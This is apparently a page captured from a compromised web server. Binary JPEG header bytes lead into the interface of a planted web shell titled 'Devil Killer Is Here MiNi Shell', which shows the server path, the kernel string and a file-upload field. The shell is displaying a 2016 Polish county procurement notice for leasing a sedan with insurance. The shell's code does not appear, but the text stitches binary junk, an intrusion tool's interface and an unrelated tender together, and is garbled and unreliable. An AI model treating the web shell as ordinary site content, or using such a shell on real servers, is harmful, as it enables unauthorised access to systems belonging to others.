JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160913/307799-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 307799 - 2016
              z dnia 2016-09-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Strzelce Krajeńskie: Dostawa nowego samochodu osobowego klasy średniej z segmentu D (rok produkcji 2016) w ramach  leasingu operacyjnego z opcją wykupu samochodu dla  powiatu strzelecko-drezdeneckiego wraz z ubezpieczeniem w zakresie AC, OC, NNW, Assistance<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiat Strzelecko-Drezdenecki, krajowy numer identyfikacyjny
              21096735000000, ul.
              ul. Ks. St. Wyszyńskiego 
              7,
              66500  
              Strzelce Krajeńskie, woj.
              lubuskie, państwo
              , tel.
              957 632 380, e-mail
              zamowienia.publiczne@poczta.onet.pl, faks
              957 631 126.
              <br />
              Adres strony internetowej (URL): www.fsd.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.fsd.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Starostwo Powiatowe w Strzelcach Krajeńskich<br />
                Adres:
                <br />ul. Ks. St. Wyszyńskiego 7 66-500 Strzelce Krajeńskie</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa nowego samochodu osobowego klasy średniej z segmentu D (rok produkcji 2016) w ramach  leasingu operacyjnego z opcją wykupu samochodu dla  powiatu strzelecko-drezdeneckiego wraz z ubezpieczeniem w zakresie AC, OC, NNW, Assistance<br /><b>Numer referencyjny: </b>RG.272.11.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa w ramach  leasingu operacyjnego z opcją wykupu samochodu dla  Powiatu Strzelecko-Drezdeneckiego (opcja wykupu 1% wartości samochodu) jednego, fabrycznie nowego, samochodu osobowego, wyprodukowanego nie wcześniej niż w roku 2016 r., spełniającego wymogi obowiązujących norm i przepisów w prawie krajowym i wspólnotowym, w szczególności odnoszących się do pojazdów samochodowych związanych z dopuszczeniem do ruchu i norm związanych z zanieczyszczeniem środowiska. 

Wszystkie koszty związane z realizacją zamówienia Wykonawca jest zobowiązany ująć w cenie ofertowej.

Wymagane warunki techniczne:
Rok produkcji: 2016
Typ silnika: diesel
Pojemność silnika: min. 1900 cm3
Moc silnika: Min. 150 KM
Pojemność silnika: min. 1900 cm3
Skrzynia biegów: manualna, 6-cio biegowa
Zbiornik paliwa min. 60 l.
Poziom emisji CO2 g/km max.  110
Norma emisji spalin Min. EURO 6
Typ nadwozia: 4-ro drzwiowe typu sedan, przystosowane do przewozu 5 osób
Długość nadwozia: min. 4 750 mm
Szerokość/wysokość nadwozia: min. 1850 mm /maks. 1500 mm
Rozstaw osi: min 2700
Kolor nadwozia: Czarny lub grafitowy lub ciemno  szary  - lakier metalizowany lub perłowy
Przebieg: Bez przebiegu (dopuszcza się przebieg transportowy)
Kolor tapicerki: Czarny lub ciemno szary

Wyposażenie:
Przednie i boczne poduszki powietrzne kierowcy i pasażera
Kurtyny powietrzne
Wspomaganie układu kierowniczego
Trzypunktowe pasy bezpieczeństwa z przodu z regulacją wysokości mocowania
System zapobiegania blokowaniu kół podczas hamowania
Podgrzewana szyba przednia z podgrzewanymi spryskiwaczami
Elektrycznie sterowane i podgrzewane lusterka zewnętrzne
Układ stabilizacji toru jazdy
Wspomaganie nagłego hamowania
Przednie i tylne światła przeciwmgielne
Centralny zamek ze zdalnym sterowaniem
Czujnik parkowania przód i tył
Klimatyzacja automatyczna trzystrefowa
Fabryczny radioodtwarzacz RDS, głośniki, wejście Aux-In, gniazdo USB
Zestaw głośnomówiący z Bluetooth
Funkcja włączania oświetlenia przy wsiadaniu
Szyby o wyższym stopniu przyciemnienia  tylne i tylno-boczne
Zderzaki, lusterka zewnętrzne i klamki lakierowane w kolorze nadwozia
Elektrycznie otwierane szyby drzwi  przednich i tylnych
Regulowana w dwóch płaszczyznach kolumna kierownicy
Kierownica trójramienna, multifunkcyjna, obszyta skórą
Koło zapasowe pełnowymiarowe
Obręcze kół z lekkich stopów min. 18 wraz z oponami letnimi (ogumienie fabrycznie nowe z 2016 r., rozmiar opon oraz ich parametry zgodne z zaleceniami producenta)
Obręcze kół z lekkich stopów min. 18 wraz z oponami zimowymi (ogumienie fabrycznie nowe z 2016 r., rozmiar opon oraz ich parametry zgodne z zaleceniami producenta)
Komputer pokładowy w języku polskim
Autoalarm i immobiliser
Zagłówki regulowane dla każdego z siedzeń (5 szt.)
Dywaniki materiałowe firmowe z przodu i z tyłu
Wbudowana nawigacja satelitarna w jeżyku polskim
Samochód wyposażony w apteczkę, spełniającą normy DIN 13164. trójkąt ostrzegawczy, gaśnicę, komplet żarówek.

1.	Do samochodu będącego przedmiotem zamówienia Wykonawca zobowiązuje się dołączyć następujące dokumenty:
a)	kartę pojazdu;
b)	kartę gwarancyjną pojazdu;
c)	dowód rejestracyjny;
d)	polisę ubezpieczeniową potwierdzającą ubezpieczenie samochodu;
e)	instrukcję obsługi pojazdu  i wyposażenia (w języku polskim);
f)	wyciąg ze świadectwa homologacji pojazdu, sporządzony w języku polskim;
g)	dokument potwierdzający spełnienie normy emisji spalin.

2.	Samochód przedstawiony do odbioru zamawiającemu powinien być:
a)	dopuszczony do ruchu przez właściwy organ administracyjny,
b)	z wykonanym przeglądem zerowym i gwarancją określoną w książce gwarancyjnej,
c)	zatankowany (min. 10 l paliwa),
d)	wyposażony w opony zimowe i letnie wraz z felgami. 

3.	Zamawiający przewiduje możliwość skorzystania z prawa opcji. Opcja obejmuje prawo nabycia przez zamawiającego używanego samochodu będącego przedmiotem leasingu. 
W takim przypadku zamawiający zobowiązany będzie do zawiadomienia wykonawcy  w formie pisemnej  o zamiarze skorzystania z tego prawa w terminie do 15 dni przed upływem 48 miesięcy od dnia wydania samochodu. Nabycie przez zamawiającego samochodu nastąpi na podstawie odpowiednich dokumentów przenoszących własność samochodu podpisanych przez zamawiającego i wykonawcę, za cenę wskazaną w ofercie wykonawcy, w wysokości 1% ceny brutto wybranego samochodów.
4.	W przypadku gdy zamawiający nie skorzysta z opcji wykupu wykonawca zobowiązuje się do odebrania samochodu na własny koszt, w terminie 14 dni od dnia zawiadomienia przez zamawiającego o rezygnacji z opcji wykupu.
5.	Miejscem odbioru samochodu będzie miejsce wskazane przez Zamawiającego  Starostwo Powiatowe w Strzelcach Krajeńskich ul. Ks. St. Wyszyńskiego 7. 
6.	Dostawę należy zrealizować w terminie do 20 grudnia 2016r. 
7.	Wykonawca zobowiązuje się wykonać przedmiot zamówienia zgodnie ze wszystkimi wymaganiami Zamawiającego wskazanymi w SIWZ.
Wymagania dotyczące leasingu: 
1.	Leasing operacyjny.
2.	Leasing rozliczany w złotych polskich.
3.	Raty leasingowe równe.
4.	Okres leasingu  47 miesięcy.
5.	Wartość opłaty wstępnej  30 tys. zł. płatna w terminie  7 dni od dnia podpisania umowy,  pod warunkiem otrzymania faktury Vat przed upływem tego terminu,  po podpisaniu bez uwag protokołu zdawczo  odbiorczego samochodu.
6.	Wartość wykupu przedmiotu leasingu  1% wartości samochodu.
7.	koszty opłaty ubezpieczenia OC, AC, NNW i Assistance na kraje Unii Europejskiej    w trakcie trwania umowy przez pierwsze 12 miesięcy ponosi Wykonawca, koszty te należy skalkulować w racie leasingowej.
8.	Spłata rat leasingowych następować będzie od stycznia 2017 r.  Zapłata wynagrodzenia z tytułu miesięcznych, równych rat leasingowych będzie następowała na podstawie harmonogramu finansowego, pod warunkiem dostarczenia faktury VAT do Zamawiającego, przed upływem terminu zapłaty wskazanego w harmonogramie, przelewem na rachunek bankowy Wykonawcy. 

Warunki ubezpieczenia:
1. Wymagane warunki AC: 
1)	Suma ubezpieczenia powinna odpowiadać wartości pojazdu w dniu zawarcia umowy ubezpieczenia.
2)	Ubezpieczeniem powinny być objęte szkody powstałe w pojeździe bądź jego wyposażeniu polegające na:
a)	uszkodzeniu pojazdu w związku z ruchem i postojem wskutek:
-	nagłego działania siły mechanicznej w chwili zetknięcia pojazdu z pochodzącymi   z zewnątrz pojazdu: innym pojazdem, osobami, zwierzętami lub przedmiotami,
-	działania osób trzecich, w tym również włamania,
b)	uszkodzeniu lub utracie pojazdu wskutek następujących zdarzeń losowych:
-	powodzi, zatopienia, uderzenia pioruna, pożaru, wybuchu, opadu atmosferycznego, huraganu, osuwania lub zapadania się ziemi,
-	nagłego działania czynnika termicznego lub chemicznego pochodzącego z zewnątrz pojazdu,
c)	uszkodzeniu wnętrza pojazdu przez osoby, których przewóz wymagany był potrzebą udzielenia pomocy medycznej,
d)	kradzieży pojazdu, jego części lub wyposażenia,
e)	uszkodzeniu pojazdu w następstwie jego zabrania w celu krótkotrwałego użycia, kradzieży pojazdu, jego części lub wyposażenia.
3)	Przedmiot ubezpieczenia: pojazd wraz z wyposażeniem podstawowym oraz wyposażeniem dodatkowym bez zastosowania udziału własnego w szkodach AC - w ruchu i postoju oraz AC  kradzież, wysokość odszkodowania zostanie ustalona od pełnej wartości samochodu wraz 
z podatkiem VAT.
4)	W szkodach polegających na uszkodzeniu ubezpieczonego pojazdu przy ustaleniu wartości szkody nie będzie potrącane zużycie eksploatacyjne części zamiennych zakwalifikowanych do wymiany  zniesienie amortyzacji.
5)	Na wysokość wypłaconego odszkodowania nie będzie miało wpływu naruszenie przez Ubezpieczonego przepisów Prawa o ruchu drogowym.
6)	Likwidacja szkód nastąpi poprzez bezgotówkową naprawę w autoryzowanej stacji obsługi.
7)	Stała suma odszkodowania  suma ubezpieczenia pojazdu nie podlega pomniejszeniu 
o wypłacone odszkodowania oraz utratę wartości pojazdu (brak konieczności do ubezpieczania pojazdu po szkodzie).

2. Wymagane warunki OC:
W zakresie określonym ustawą z dnia 22 maja 2003 r. o ubezpieczeniach obowiązkowych, Ubezpieczeniowym Funduszu Gwarancyjnym i Polskim Biurze Ubezpieczycieli Komunikacyjnych (Dz. U. Nr 392z 2013 r. ze zmianami).

3. Wymagane warunki NNW: 
1)	Ubezpieczeniem powinni być objęci: kierowca i każdy z pasażerów.
2)	Suma ubezpieczeń wynosi 15 000 zł w przypadku szkód na osobie.
3)	Przedmiotem ubezpieczenia będą co najmniej trwałe następstwa nieszczęśliwych wypadków powstałych:
a)	podczas wsiadania do pojazdu i wysiadania z pojazdu,
b)	podczas przebywania w pojeździe w przypadku zatrzymania pojazdu lub postoju na trasie jazdy,
c)	podczas naprawy pojazdu na trasie jazdy.
4)	W ramach sumy ubezpieczenia Ubezpieczyciel powinien gwarantować następujące świadczenia:
a)	świadczenia z tytułu trwałego uszczerbku na zdrowiu będącego następstwem nieszczęśliwego wypadku w stosunku procentowym do sumy ubezpieczenia w jakim ubezpieczony doznał trwałego uszczerbku, w wysokości 1% sumy ubezpieczenia za każdy procent trwałego uszczerbku na zdrowiu,
b)	świadczenia z tytułu śmierci zaistniałej w wyniku NNW w wysokości 100% sumy ubezpieczenia, 
c)	zwrot kosztów nabycia (w złotych) środków pomocniczych i protez proporcjonalnie do stopnia trwałego uszczerbku lecz nie więcej niż do wysokości 10% sumy ubezpieczenia, 
d)	zwrot kosztów leczenia (w złotych) NNW proporcjonalnie do stopnia trwałego uszczerbku lecz nie więcej niż do wysokości 10% sumy ubezpieczenia, 
e)	zwrot udokumentowanych kosztów transportu zwłok od miejsca zgonu do miejsca pochowania.

4. Wymagane warunki Assistance:
1) Ubezpieczenie Assistance, powinno gwarantować kierowcom i pasażerom pojazdów:
a)	pomoc w trudnych sytuacjach, takich jak wypadek, awaria, unieruchomienie oraz kradzież pojazdu, a także w przypadkach nagłego zachorowania kierowcy oraz urazu ciała kierowcy lub pasażera,
b)	pomoc techniczną, medyczną, organizacyjną  i informacyjną, udzielaną na terenie całej Polski,
c)	bezpłatne holowanie z miejsca wypadku dla poszkodowanego oraz dla sprawcy wypadku lub kolizji, 
d)	pełen zakres bezpłatnych usług pomocy drogowej,
e)	pojazd zastępczy.
2. Świadczeniami realizowanymi pod warunkiem zaistnienia zdarzenia objętego ochroną ubezpieczeniową w odległości powyżej 50 km od siedziby leasingobiorcy, która użytkuje samochód  powinny być:
a)	w przypadku awarii pojazdu:
-	pomoc kierowcy i pasażerom, (zakwaterowanie lub przejazd do miejsca zamieszkania lub pobytu, odbiór naprawionego pojazdu),
-	pomoc techniczna dotycząca pojazdu (naprawa na miejscu zdarzenia albo holowanie do najbliższej autoryzowanej stacji obsługi,
b)	w przypadku unieruchomienia pojazdu z powodu wypadku lub awarii, Ubezpieczyciel powinien organizować i pokrywać koszty naprawy na miejscu zdarzenia albo organizować 
i pokrywać koszty holowania do najbliższej autoryzowanej stacji obsługi (ewentualnie najpierw na wybrany przez Ubezpieczyciela parking, jeżeli zdarzenie zaszło poza godzinami pracy autoryzowanej stacji obsługi) albo do miejsca zamieszkania lub pobytu (lub autoryzowanej stacji obsługi w pobliżu miejsca zamieszkania lub pobytu) posiadacza pojazdu wg następujących limitów:
-	limit kwotowy naprawy na miejscu zdarzenia powinien wynosić co najmniej 400 PLN,
-	limit kwotowy holowania pojazdu do najbliższej autoryzowanej stacji obsługi powinien wynosić co najmniej 400 PLN albo do miejsca zamieszkania lub pobytu (lub warsztatu w pobliżu miejsca zamieszkania lub pobytu) 600 PLN.
c)	w przypadku unieruchomienia pojazdu z powodu braku paliwa, Ubezpieczyciel   organizuje 
i pokrywa koszty dostarczenia właściwego paliwa (z wyłączeniem kosztów paliwa) do miejsca zatrzymania tego pojazdu w ilości niezbędnej do dojechania do najbliższej czynnej stacji paliw,
d)	jeżeli w następstwie wypadku lub awarii pojazd jest unieruchomiony i gdy jego naprawa nie może odbyć się w tym samym dniu, w którym nastąpiło zdarzenie (np. dzień świąteczny, weekend) albo gdy pojazd został skradziony i nie odzyskano go w dniu kradzieży, Ubezpieczyciel:
-	organizuje i pokrywa koszty przejazdu do najbliższego hotelu oraz zakwaterowania (noclegów) kierowcy i pasażerów pojazdu w hotelu  do momentu naprawienia lub odzyskania tego pojazdu i nie dłużej niż przez 3 doby; limit kwotowy zakwaterowania jednej osoby powinien wynosić co najmniej 120 PLN za dobę, 
bądź:
-	organizuje i opłaca koszty przejazdu kierowcy i pasażerów pojazdu środkiem transportu wybranym przez Ubezpieczyciela do ich miejsc zamieszkania lub pobytu, albo do miejsca przeznaczenia, gdy koszt kontynuacji podróży nie jest wyższy od kosztu przejazdu do miejsca zamieszkania lub pobytu,
-	organizuje i pokrywa koszty jednorazowego przejazdu właściciela po odbiór naprawionego albo odzyskanego po kradzieży pojazdu środkiem transportu wybranym przez Ubezpieczyciela.
e) jeżeli wskutek urazu ciała konieczny jest transport medyczny kierowcy lub pasażerów               w celu hospitalizacji, Ubezpieczyciel powinien organizować i pokrywać co najmniej koszty następujących usług:
-	transportu sanitarnego poszkodowanych do jednego z najbliższych szpitali lub:
-	przewiezienia poszkodowanych do szpitala wyposażonego w urządzenia specjalistyczne (medyczne) odpowiednim środkiem transportu z niezbędną opieką, jeżeli z medycznego punktu widzenia taki transport jest konieczny albo,
-	bezpośredniego transportu poszkodowanych lotem rejsowym do odpowiedniego szpitala albo innego ośrodka leczniczego w pobliżu miejsca zamieszkania poszkodowanego  w RP, albo bezpośrednio do jego miejsca zamieszkania lub pobytu, z niezbędną opieką medyczną, włącznie 
z przewożeniem ambulansem drogowym na i z lotniska, jeżeli jego stan zdrowia zezwala na taki transport. O możliwości oraz sposobie transportu decyduje lekarz prowadzący ubezpieczonego 
w szpitalu lub lekarz upoważniony przez Ubezpieczyciela,
f)	w przypadku, gdy kierowca doznał urazu ciała lub nagle zachorował, a żaden z pasażerów nie posiada prawa jazdy lub nie może kierować pojazdem, Ubezpieczyciel zapewnia zmiennika kierowcy w celu powrotu pasażerów ubezpieczonym pojazdem do miejsca zamieszkania lub pobytu posiadacza pojazdu. Koszty paliwa ponosi posiadacz lub pasażerowie pojazdu;
g)	w przypadku zgonu, Ubezpieczyciel organizuje i pokrywa koszty transportu zwłok do miejsca pochowania w Polsce,
h)	w razie awarii, wypadku, kradzieży lub unieruchomienia pojazdu:
-	udzielenie informacji o telefonach pomocy drogowej na terenie RP, na żądanie i koszt kierowcy, zorganizowanie przyjazdu pomocy drogowej w celu naprawy pojazdu na miejscu zdarzenia lub odholowania go do warsztatu,
-	udzielenie informacji o lokalnej sieci autoryzowanych stacji obsługi i lokalnych możliwościach naprawy pojazdu,
-	przekazanie pilnej wiadomości  w związku z zaistnieniem zdarzenia objętego ochroną ubezpieczeniową  osobie wskazanej przez kierowcę lub pasażera pojazdu,
-	udzielenie informacji w zakresie otrzymania pojazdu zastępczego.

Warunki gwarancji i serwisu:
1. Wykonawca odpowiada z tytułu gwarancji udzielonej odpowiednio na:
a)	podzespoły mechaniczne, elektryczne i elektroniczne pojazdu  min. 24 m-ce;
b)	powłokę lakierniczą  min. 36 m-cy;
c)	perforację blach nadwozia  min. 144 m-ce  liczonych od dnia podpisania bez uwag protokołu zdawczo  odbiorczego samochodu.
2. W przypadku, gdy gwarancja producenta będzie krótsza od minimalnej wymaganej przez Zamawiającego, jako wiążąca dla stron będzie gwarancja udzielona przez Wykonawcę.
3. Miejsce świadczenia usług serwisowych dla pojazdu będącego przedmiotem leasingu Wykonawca winien zapewnić w odległości nie większej niż 50 km od siedziby Zamawiającego.

Wszystkie koszty związane z realizacją zamówienia Wykonawca jest zobowiązany ująć w cenie ofertowej. W przypadku jakiejkolwiek rozbieżności pomiędzy opisem przedmiotu zamówienia w niniejszej SWIZ a stanem faktycznym, Wykonawca winien zgłosić ten fakt Zamawiającemu przed terminem składania ofert.
<br /><br /><b>II.5) Główny kod CPV: </b>34110000-1<br /><b> Dodatkowe kody CPV:</b>66110000-4,
                66514110-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 20/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
